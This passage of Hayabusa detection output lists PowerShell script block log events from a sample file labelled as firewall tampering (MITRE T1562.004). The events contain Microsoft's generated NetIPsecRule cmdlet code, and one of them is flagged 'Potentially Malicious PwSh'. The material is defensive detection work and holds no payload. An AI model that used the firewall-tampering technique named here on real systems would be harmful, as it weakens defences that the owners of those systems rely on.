[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing()",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"} } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' -Alias '*' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' -Alias '*' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Binding",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"} } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' -Alias '*' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' -Alias '*' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Binding",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or 